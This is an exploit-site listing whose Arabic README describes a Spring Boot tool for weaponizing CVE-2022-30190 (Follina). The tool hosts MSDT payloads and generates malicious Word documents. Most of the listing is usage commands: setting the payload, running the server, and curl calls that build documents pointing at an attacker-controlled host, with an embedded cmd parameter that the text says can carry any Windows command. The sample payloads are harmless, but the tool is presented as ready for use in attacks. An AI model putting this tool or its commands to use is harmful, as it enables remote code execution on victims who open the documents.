Sploitus

Exploit for follina-spring

kitploit · 2026-08-29

Exploit Code

MARKDOWN74 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-DSIBILIO-FOLLINA-SPRING
# استغلال Follina MS-MSDT مع Spring Boot

يحتوي هذا المستودع على تطبيق **Spring Boot** بسيط يعمل كخادم **لاستضافة/تفعيل حمولات Follina** ، وكمُولّد **لمستندات Word ضارة** جاهزة للاستخدام كنواقل هجوم لاستغلال CVE-2022-30190.

تتكون هذه الثغرة من **تنفيذ عن بعد للكود** عبر MSDT _(أداة تشخيص الدعم من مايكروسوفت ويندوز)_.

## الحمولة من جانب الخادم

لتقديم حمولة فريدة من اختيارك، يجب عليك:

  * تحديد **الحمولة** ، مثال:



root@kitploit:~
    
    
    export FOLLINA_PAYLOAD="notepad.exe"
    

  * تشغيل **الخادم** لاستضافة الحمولة الثابتة:



root@kitploit:~
    
    
    mvn spring-boot:run
    

  * توليد **مستند Word** "Follina":



root@kitploit:~
    
    
    curl -s http://localhost:8080/generateDoc?address=http://192.168.64.128:8080 -o follina.doc
    

**إذا كنت ترغب في تغيير الحمولة الحالية، يجب عليك إيقاف الخادم النشط حاليًا أولاً** ، ثم تكرار الخطوات بعد تعريف الحمولة الجديدة.

**ملاحظة:** يمكن استبدال الحمولة بأي أمر آخر، طالما يمكن تشغيله عبر موجه أوامر ويندوز.

## الحمولة من جانب العميل

لتقديم حمولة من جانب العميل من اختيارك، يجب عليك:

  * تشغيل **الخادم** لتفعيل الحمولات وقت التشغيل:



root@kitploit:~
    
    
    mvn spring-boot:run
    

  * توليد **مستند Word** "Follina" مع تحديد معلمة الاستعلام `cmd`، مثال:



root@kitploit:~
    
    
    curl -sG http://localhost:8080/generateDoc --data-urlencode 'address=http://192.168.64.128:8080' --data-urlencode 'cmd=start msedge.exe https://www.youtube.com/watch?v=zqTwOoElxBA' -o follina.doc
    

**في هذه الحالة، تكون الحمولة مضمنة داخل المستند** ، وستحتاج ببساطة إلى _التفعيل_ عن طريق الاتصال بالخادم. بهذه الطريقة، يمكنك توزيع حمولات مختلفة متعددة عبر مستندات مختلفة ولن تضطر إلى إعادة تشغيل الخادم لتفعيل تغييرات الحمولة - حيث يمكنك ببساطة توليد مستند جديد مع الحمولة المطلوبة مضمنة.

### شكر وتقدير

شكر جزيل لـ John Hammond على تقديم تنفيذ Python ومشاركة تحليله للثغرة.